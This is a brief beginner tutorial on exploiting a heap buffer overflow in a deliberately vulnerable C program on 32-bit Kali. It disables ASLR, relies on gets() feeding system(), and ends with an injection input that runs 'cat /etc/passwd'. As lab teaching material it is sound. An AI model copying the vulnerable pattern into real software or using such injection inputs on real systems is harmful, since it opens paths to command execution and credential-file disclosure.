My First BoF

A very old guide I found one of my HDD's

Creating your first buffer overflow

In a 32 bit Kali installation open a terminal and type the following command and set the value to 0

sudo nano /proc/sys/kernel/randomize_va_space

This will turn off ASLR on the system (this is a protection against buffer overflows)

Next type

nano overflow.c

And copy the following vulnerable code into the text box.

#include <stdio.h>
main() {
            char *name;
            char *dangerous_system_command;
            name = (char *) malloc(10);
            dangerous_system_command = (char *) malloc(128);
            printf("Address of name is %d\n", name);
            printf("Address of command is %d\n", dangerous_system_command);
            sprintf(dangerous_system_command, "echo %s", "hello world!");
            printf("whats your name?");
            gets(name);
            system(dangerous_system_command);
}

This code is written in C and essentially it creates 2 variables name and dangerous_system_command it then allocates a memory buffer for each variable. The next 2 print statements print out the address in memory. The program will then ask for your name, it uses the vulnerable command “gets” (which does not sanitise input). If the input is of correct size the program will print out “hello world” lets do this now.

type:

./overflow

to run the program and look at the memory addresses. you should be able to count the difference between them.

If we enter a string that is greater than 32 characters we see that we get an error message that looks like the shell command “r” can not be found. The letter “r” is the 33rd character of the input.

So if we know the program has a 32 length buffer and that if we overflow the name variable of 32 bytes we end up in a command variable, why not forge a command at the end of our buffer overflow. To do this we would need a string of 32bit length and a command at the end of it. like so:

12345678901234567890123456789012cat /etc/passwd

Last updated